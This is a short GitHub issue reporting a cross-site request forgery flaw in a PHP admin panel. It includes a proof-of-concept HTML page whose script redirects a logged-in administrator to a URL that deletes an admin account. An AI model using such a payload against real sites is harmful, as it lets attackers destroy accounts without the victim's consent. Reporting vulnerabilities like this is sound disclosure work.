Skip to content

Remove the admin interface has a csrf vulnerability #14

@PickledFish

Description

@PickledFish

After the administrator logged in, open the following page:

save in payload.html

<title>Title</title> <script type="text/javascript"> window.location.href='http://192.168.1.2/admin.php?m=Member&a=admindelete&id=1'; </script>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions